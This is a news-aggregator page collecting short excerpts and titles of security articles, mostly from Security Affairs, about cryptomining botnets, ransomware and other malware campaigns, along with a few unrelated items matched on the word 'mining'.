Communications and Mining - Information Management Today

Prometei, a new modular crypto-mining botnet exploits Windows SMB

Security Affairs

JULY 22, 2020

Prometei is a crypto-mining botnet that recently appeared in the threat landscape, it exploits the Microsoft Windows SMB protocol for lateral movements. Security experts from Cisco Talos discovered a new crypto-mining botnet, tracked as Prometei, that exploits the Microsoft Windows SMB protocol for lateral movements.

Mining

Mining File names Passwords Communications

Phishers abuse CrowdStrike brand targeting job seekers with cryptominer

Security Affairs

JANUARY 10, 2025

The executable then downloads a text file containing XMRig configuration details to initiate mining activities. “Individuals in the recruitment process should verify the authenticity of CrowdStrike communications and avoid downloading unsolicited files.” ” concludes the report.

Phishing

Phishing Mining Authentication Communications

New KryptoCibule Windows Trojan spreads via malicious torrents

Security Affairs

SEPTEMBER 2, 2020

The malware uses the victim’s resource to mine cryptocurrency, steals cryptocurrency wallet-related files, and replaces wallet addresses in the clipboard to hijack cryptocurrency payments. Both of these programs are set up to connect to an operator-controlled mining server over the Tor proxy.” ” reads the report.

Mining

Mining Communications IT Security

Webinars

How to Achieve High-Accuracy Results When Using LLMs

MORE WEBINARS

Group-IB: The Shadow Market Is Flooded with Cheap Mining Software

Security Affairs

AUGUST 11, 2018

Group-IB is recording new outbreaks of illegal mining (cryptojacking) threats in the networks of commercial and state organizations. Group-IB, an international company specializing in the prevention of cyberattacks, is recording new outbreaks of illegal mining (cryptojacking) threats in the networks of commercial and state organizations.

Mining

Mining Marketing IoT Compliance

Doki, an undetectable Linux backdoor targets Docker Servers

Security Affairs

JULY 29, 2020

The ongoing Ngrok mining botnet campaign is targeting servers are hosted on popular cloud platforms, including Alibaba Cloud, Azure, and AWS. “ Ngrok Mining Botnet is an active campaign targeting exposed Docker servers in AWS, Azure, and other cloud platforms. .” ” continues the report.

Blockchain

Blockchain Mining Cloud Communications

Cryptomining DreamBus botnet targets Linux servers

Security Affairs

JANUARY 25, 2021

. “These particular applications are targeted because they often run on systems that have powerful underlying hardware with significant amounts of memory and powerful CPUs—all of which allow threat actors to maximize their ability to monetize these resources through mining cryptocurrency.” Ransomware, data theft).

Mining

Mining Passwords Communications Ransomware

Previously undetected VictoryGate Botnet already infected 35,000 devices

Security Affairs

APRIL 27, 2020

The VictoryGate bot propagates via infected USB devices, it was designed to mine Monero abusing resourced of compromised devices, it is also able to deliver additional payloads. The malware uses a stratum/XMRig proxy to hide the mining pool and terminates the mining process when the user opens Task Manager, to avoid to show the CPU usage.

Mining

Mining Communications IT Security

Hackers target Docker servers to deploy the new Kinsing cryptocurrency miner

Security Affairs

APRIL 6, 2020

Experts uncovered a hacking campaign that is breaching Docker clusters to deploy a new crypto-mining malware tracked as Kinsing. ” The Kinsing malware abuses the resources of the Docker installations to mine cryptocurrency, hackers exploit unprotected open Docker API port to instantiate an Ubuntu container. “The spre.

Mining

Mining Libraries Cloud Communications

The City of Durham shut down its network after Ryuk Ransomware attack

Security Affairs

MARCH 8, 2020

“IT officials are working to get the communication systems back online.” A few days ago EVRAZ , one of the world’s largest multinational vertically integrated steel making and mining companies, has been hit by the Ryuk ransomware. 911 calls, though, are being answered.”

Ransomware

Ransomware IT Computer and Electronics Mining

New Perfctl Malware targets Linux servers in cryptomining campaign

Security Affairs

OCTOBER 4, 2024

For communication, it uses a Unix socket internally and TOR externally. The malicious code copies itself to various disk locations using deceptive names, establishes a backdoor on the server for TOR communications. Once unpacked and decrypted it communicates with cryptomining pools.” ” reads the report.

Communications

Communications Encryption Mining Access

Cryptojacking campaign uses Shodan to scan for Docker hosts to hack

Security Affairs

JUNE 1, 2019

This script also starts an SSH daemon inside the container for remote communication.” “The script then calls a Monero coin-mining binary, darwin (detected as PUA.Linux.XMRMiner.AA), to run in the background. It also checks if the Docker host already runs a cryptocurrency-mining container and delete it if it exists.

Mining

Mining Honeypots Cloud Passwords

MrbMiner cryptojacking campaign linked to Iranian software firm

Security Affairs

JANUARY 23, 2021

Sophos researchers that investigated the recently uncovered crypto-mining campaign targeting SQL servers with MrbMiner malware believe that it was conducted by an Iran-based company. The experts discovered that the cryptominer was downloaded from the vihansoft.ir, mrbfile, and mrbftp domains and communicated with the poolmrb/mrbpool domains.

Mining

Mining Communications Access Privacy

Your Garage Opener Is More Secure Than Industrial Remotes

Data Breach Today

JANUARY 16, 2019

Trend Micro Says It Moved Cranes Using RF Software Flaws Radio controllers used in the construction, mining and shipping industries are dangerously vulnerable to hackers, Trend Micro says in a new report.

Mining

Mining Manufacturing Security Communications

ExCobalt Cybercrime group targets Russian organizations in multiple sectors

Security Affairs

JUNE 24, 2024

Over the past year, ExCobalt targeted Russian organizations in the the following industries: Metallurgy Telecommunications Mining Information technology Government Software development The Cobalt’s hallmark was the use of the CobInt tool , the same tool that ExCobalt began using in 2022.

File names

File names Communications Mining Archiving

Android Botnet leverages ADB ports and SSH to spread

Security Affairs

JUNE 22, 2019

Trend Micro recently discovered an Android crypto-currency mining botnet that can spread via open ADB (Android Debug Bridge) ports and Secure Shell (SSH). Security researchers at Trend Micro have discovered an new Android crypto-currency mining botnet that spreads via open ADB ( Android Debug Bridge ) ports and Secure Shell (SSH).

Mining

Mining Honeypots Authentication Communications

Crooks continue to abuse exposed Docker APIs for Cryptojacking

Security Affairs

OCTOBER 28, 2018

Earlier this year Sysdig and Aqua Security researchers started observing cyber attacks targeting Kubernets and Docker instances aimed at mining Monero cryptocurrency. Miscreants can abuse Docker Engine API to deploy containers they have created with the specific intent of mining cryptocurrencies.

Mining

Mining Systems administration Encryption Authentication

DirtyMoe botnet infected 100,000+ Windows systems in H1 2021

Security Affairs

JUNE 22, 2021

The Windows botnet has been active since late 2017, it was mainly used to mine cryptocurrency, but it was also involved in DDoS attacks in 2018. Communication with C&C servers is based on DNS requests and it uses a special mechanism translating DNS results to a real IP address. ” concludes the analysis.”

Mining

Mining Passwords Communications IT

The latest variant of the RapperBot botnet adds cryptojacking capabilities

Security Affairs

MAY 14, 2023

Initially, they deployed and executed a separate Monero miner alongside the usual RapperBot binary, but starting from January 2023, they included the mining capabilities in the bot. The malware decodes the mining pools and Monero wallet addresses and updates the configuration before starting the embedded miner.

Mining

Mining IoT Passwords Authentication

Multiple threat actors exploit PHP flaw CVE-2024-4577 to deliver malware

Security Affairs

JULY 11, 2024

top, which was observed in Muhstik botnet activities, and communicates via Internet Relay Chat. The attackers injected a command that relies on a PowerShell script to download and execute a script to spin up XMRig from a remote mining pool. The bot also connects to the command and control domain p.findmeatthe[.]top,

Honeypots

Honeypots File names Mining IoT

FritzFrog cryptocurrency P2P botnet targets Linux servers over SSH

Security Affairs

AUGUST 19, 2020

In this network with no single point-of-failure, peers constantly communicate with each other to keep the network alive, resilient and up-to-date.” ” The botnet’s P2P communication is encrypted using AES for symmetric encryption and the Diffie-Hellman protocol for key exchange. .

Encryption

Encryption Mining Communications Access

New HEH botnet wipes devices potentially bricking them

Security Affairs

OCTOBER 7, 2020

Experts pointed out that the bot doesn’t contain any offensive features, such as the ability to launch DDoS attacks or to mine cryptocurrency, a circumstance that suggests the malware is under development. In the current version, each node cannot send control command to its peers. ” concludes the post.

IoT

IoT Mining Communications IT

StripedFly, a complex malware that infected one million devices without being noticed

Security Affairs

OCTOBER 30, 2023

The malicious code relies on a built-in TOR network tunnel for C2 communications, it supports an update and delivery functionality through trusted services such as GitLab, GitHub, and Bitbucket. Kaspersky discovered that the detections between 2017 and 2022 had previously misclassified as a cryptocurrency miner.

Ransomware

Ransomware Mining Communications IT

RedFoxtrot operations linked to China’s PLA Unit 69010 due to bad opsec

Security Affairs

JUNE 19, 2021

“RedFoxtrot has primarily targeted aerospace and defense, government, telecommunications, mining, and research organizations in Afghanistan, India, Kazakhstan, Kyrgyzstan, Pakistan, Tajikistan, and Uzbekistan. located in Wuhan.” ” concludes the report.

Military

Military Mining Government Communications

Torii botnet, probably the most sophisticated IoT botnet of ever

Security Affairs

SEPTEMBER 29, 2018

. “Unlike the aforementioned IoT botnets, this one tries to be more stealthy and persistent once the device is compromised, and it does not (yet) do the usual stuff a botnet does like DDOS , attacking all the devices connected to the internet, or, of course, mining cryptocurrencies.” ” concludes the analysis.

IoT

IoT Communications Mining Encryption

New P2Pinfect version delivers miners and ransomware on Redis servers

Security Affairs

JUNE 26, 2024

Researchers warn that the P2Pinfect worm is targeting Redis servers with ransomware and cryptocurrency mining payloads. Cado Security researchers warned that the P2Pinfect worm is employed in attacks against Redis servers, aimed at deploying both ransomware and cryptocurrency mining payloads.

Ransomware

Ransomware Mining Passwords Access

Improve safety using root cause analysis and strengthening information management

OpenText Information Management

NOVEMBER 13, 2024

The energy and resources sector including utilities, oil and gas, chemicals, and metals & mining is one of the most hazardous in the world. Elevate customer communications with empathy during emergency response. Despite the hazardous nature, the safety performance has continually improved over the last 4 decades.

Energy and Utilities

Energy and Utilities Mining Communications Risk

Prometei botnet evolves and infected +10,000 systems since November 2022

Security Affairs

MARCH 11, 2023

The crypto-mining botnet has a modular structure and employs multiple techniques to infect systems and evade detection. Then the main module retrieves the actual crypto-mining payload and other modules, it also establishes persistence on the infected systems and ensure C2 communications.

Mining

Mining Communications Security IT

Cranes, drills and other industrial machines exposed to hack by RF protocols

Security Affairs

JANUARY 15, 2019

Researchers from Trend Micro have analyzed the communication protocols used by cranes and other industrial machines and discovered several flaws. Security experts from Trend Micro have discovered several vulnerabilities in the communication protocols used by cranes, hoists, drills and other industrial machines.

Communications

Communications Mining Risk Manufacturing

KashmirBlack, a new botnet in the threat landscape that rapidly grows

Security Affairs

OCTOBER 26, 2020

It handles hundreds of bots, each communicating with the C&C to receive new targets, perform brute force attacks, install backdoors, and expand the size of the botnet.” ” reads the first part of two reports published by the experts detailing the DevOps implementation behind the botnet. .”

CMS

CMS Mining Communications Security

Highly evasive cryptocurrency miner targets macOS

Security Affairs

FEBRUARY 24, 2023

This malware relies on the i2p (Invisible Internet Project) anonymization network for communication. The malicious code uses i2p to download malicious components and send mined currency to the attacker’s wallet. Today, many malicious applications continue to go undetected by most AV vendors.

Mining

Mining Passwords Communications Security

Text Mining Frees Customer Insights Trapped in Unstructured Content

OpenText Information Management

JULY 9, 2024

Dig out trapped insights with text mining Traditional methods for gaining customer insights – like combing through 3rd-party review websites, Google Analytics, competitive research, and survey results – are slow and expensive. What is text mining? They also leave a lot of the good stuff buried because it’s too difficult to pull out.

Mining

Mining Analytics Information governance Communications

Oracle critical patch advisory addresses 284 flaws, 33 critical

Security Affairs

JANUARY 18, 2019

The bug affected the OCA’s Diameter Signalling Router component and its Communications Services Gatekeeper. The critical patch advisory for 2019 also fixed the CVE-2018-11776 vulnerability in the OCA’s Communications Policy Management Component, this issue was exploited in 2018 by threat actors to mine cryptocurrency.

Financial Services

Financial Services Libraries Mining Retail

Security Affairs newsletter Round 318

Security Affairs

JUNE 13, 2021

million customers impacted. million customers impacted.

Security

Security Data breaches Mining Ransomware

Cybercriminals Are Targeting AI Conversational Platforms

Security Affairs

OCTOBER 9, 2024

Such components could be interpreted as a subclass of AI agents responsible for orchestrating the communication workflow between the end user (consumer) and the AI. At some point, conversational AI platforms begin to replace traditional communication channels.

Communications

Communications Risk Cybersecurity Personal data

Outlaw is Back, a New Crypto-Botnet Targets European Organizations

Security Affairs

APRIL 28, 2020

This directory contains the crypto mining module named kswapd0. This component has two main functions: Install a cryptoMiner worker: The main purpose of this elf file is the instantiation of a crypto-mining worker. It is a fork of XMRIG project, one of the most popular software to mine monero crypto values.

Mining

Mining File names Honeypots IT

Prometei botnet is targeting ProxyLogon Microsoft Exchange flaws

Security Affairs

APRIL 26, 2021

The crypto-mining has a modular structure and employes multiple techniques to infect systems and evade detection. “The different components work together to enable the malware to perform many tasks: credential harvesting, spreading across the network, establishing C2 communications and more. ” concludes the report.

Mining

Mining Retail Insurance Manufacturing

Experts warn of 7,500+ MikroTik Routers that are hijacking owners’ traffic

Security Affairs

SEPTEMBER 4, 2018

Earlier August, experts uncovered a massive crypto jacking campaign that was targeting MikroTik routers to inject a Coinhive cryptocurrency mining script in the web traffic. Communication ports associated with the Winbox and Webfig are TCP/8291, TCP/80, and TCP/8080. CoinHive Mining Code Injection.

Mining

Mining Access Communications Security

Conti Ransomware Group Diaries, Part IV: Cryptocrime

Krebs on Security

MARCH 7, 2022

On June 6, 2021, Conti underling “ Begemot ” pitched Stern on a scheme to rip off a bunch of people mining virtual currencies, by launching distributed denial-of-service (DDoS) attacks against a cryptocurrency mining pool. Find a place where crypto holders communicate (discord, etc. ). Most likely it will be IPv6.

Ransomware

Ransomware Mining Blockchain Sales

The popularity of Dark Utilities ‘C2-as-a-Service’ rapidly increases

Security Affairs

AUGUST 5, 2022

Dark Utilities is advertised as a platform to enable remote access, command execution, conduct distributed denial-of-service (DDoS) attacks and cryptocurrency mining operations on infected systems. Dark Utilities was launched in early 2022, the platform that provides full-featured C2 capabilities to its users. ” concludes the report.

Mining

Mining Communications Access Authentication

Multi-Vector Miner+Tsunami Botnet with SSH Lateral Movement

Security Affairs

DECEMBER 2, 2020

Evasion and Persistence: The botnet achieves persistence in multiple ways; kills running processes, potentially competing for mining tools and eliminates EDR. The Miner ELF binaries connect to the following mining proxy servers: 66.70.218.40:8080 It tries to infect hosts the system has connected to previously. 8080 and 134.122.17.13:8080.

Mining

Mining IoT Cloud Security

Microsoft revealed details of a supply chain attack at unnamed Maker of PDF Editor

Security Affairs

JULY 28, 2018

The attackers compromised a font package installed by a PDF editor app and used it to spread a crypto-mining malware on victims’ machines. The attackers decompiled and modified one MSI file, an Asian fonts pack, to add the malicious payload with the coin mining code.

Mining

Mining Cloud Communications Marketing

Deceptive Google Meet Invites Lures Users Into Malware Scams

eSecurity Planet

OCTOBER 22, 2024

The reliance on virtual meetings has skyrocketed after the pandemic, making platforms like Google Meet and Zoom integral to our daily personal and professional communication. Matanbuchus and XMRig: Used for cryptocurrency mining, these malware strains can slow down systems while surreptitiously utilizing computing resources.

Phishing

Phishing Communications Cybersecurity Mining

XMR crypto miner switches from arm IoT devices to X86/I686 Intel servers

Security Affairs

SEPTEMBER 2, 2019

“I suspect it’s probably a derivate of other IoT crypto mining botnets,” Cashdollar told The Register. Additionally, the malware installs a shell script that uses to communicate with the command and control server. “This one seems to target enterprise systems.” It gain s persistence by adding entries to crontab.

IoT

IoT Honeypots Libraries Archiving

Crooks exploit exposed Docker APIs to build AESDDoS botnet

Security Affairs

JUNE 15, 2019

“In this new attack, the threat actor first externally scans a given IP range by sending a TCP SYN packet to port 2375, the default port used for communicating with the Docker daemon.” launching DDoS attacker, mining cryptocurrency, etc.). ” reads the analysis published by Trend Micro.

File names

File names Mining Access Communications

Prometei, a new modular crypto-mining botnet exploits Windows SMB

Phishers abuse CrowdStrike brand targeting job seekers with cryptominer

Webinars

Trending Sources

New KryptoCibule Windows Trojan spreads via malicious torrents

Webinars

Group-IB: The Shadow Market Is Flooded with Cheap Mining Software

Doki, an undetectable Linux backdoor targets Docker Servers

Cryptomining DreamBus botnet targets Linux servers

Previously undetected VictoryGate Botnet already infected 35,000 devices

Hackers target Docker servers to deploy the new Kinsing cryptocurrency miner

The City of Durham shut down its network after Ryuk Ransomware attack

New Perfctl Malware targets Linux servers in cryptomining campaign

Cryptojacking campaign uses Shodan to scan for Docker hosts to hack

MrbMiner cryptojacking campaign linked to Iranian software firm

Your Garage Opener Is More Secure Than Industrial Remotes

ExCobalt Cybercrime group targets Russian organizations in multiple sectors

Android Botnet leverages ADB ports and SSH to spread

Crooks continue to abuse exposed Docker APIs for Cryptojacking

DirtyMoe botnet infected 100,000+ Windows systems in H1 2021

The latest variant of the RapperBot botnet adds cryptojacking capabilities

Multiple threat actors exploit PHP flaw CVE-2024-4577 to deliver malware

FritzFrog cryptocurrency P2P botnet targets Linux servers over SSH

New HEH botnet wipes devices potentially bricking them

StripedFly, a complex malware that infected one million devices without being noticed

RedFoxtrot operations linked to China’s PLA Unit 69010 due to bad opsec

Torii botnet, probably the most sophisticated IoT botnet of ever

New P2Pinfect version delivers miners and ransomware on Redis servers

Improve safety using root cause analysis and strengthening information management

Prometei botnet evolves and infected +10,000 systems since November 2022

Cranes, drills and other industrial machines exposed to hack by RF protocols

KashmirBlack, a new botnet in the threat landscape that rapidly grows

Highly evasive cryptocurrency miner targets macOS

Text Mining Frees Customer Insights Trapped in Unstructured Content

Oracle critical patch advisory addresses 284 flaws, 33 critical

Security Affairs newsletter Round 318

Cybercriminals Are Targeting AI Conversational Platforms

Outlaw is Back, a New Crypto-Botnet Targets European Organizations

Prometei botnet is targeting ProxyLogon Microsoft Exchange flaws

Experts warn of 7,500+ MikroTik Routers that are hijacking owners’ traffic

Conti Ransomware Group Diaries, Part IV: Cryptocrime

The popularity of Dark Utilities ‘C2-as-a-Service’ rapidly increases

Multi-Vector Miner+Tsunami Botnet with SSH Lateral Movement

Microsoft revealed details of a supply chain attack at unnamed Maker of PDF Editor

Deceptive Google Meet Invites Lures Users Into Malware Scams

XMR crypto miner switches from arm IoT devices to X86/I686 Intel servers

Crooks exploit exposed Docker APIs to build AESDDoS botnet

Stay Connected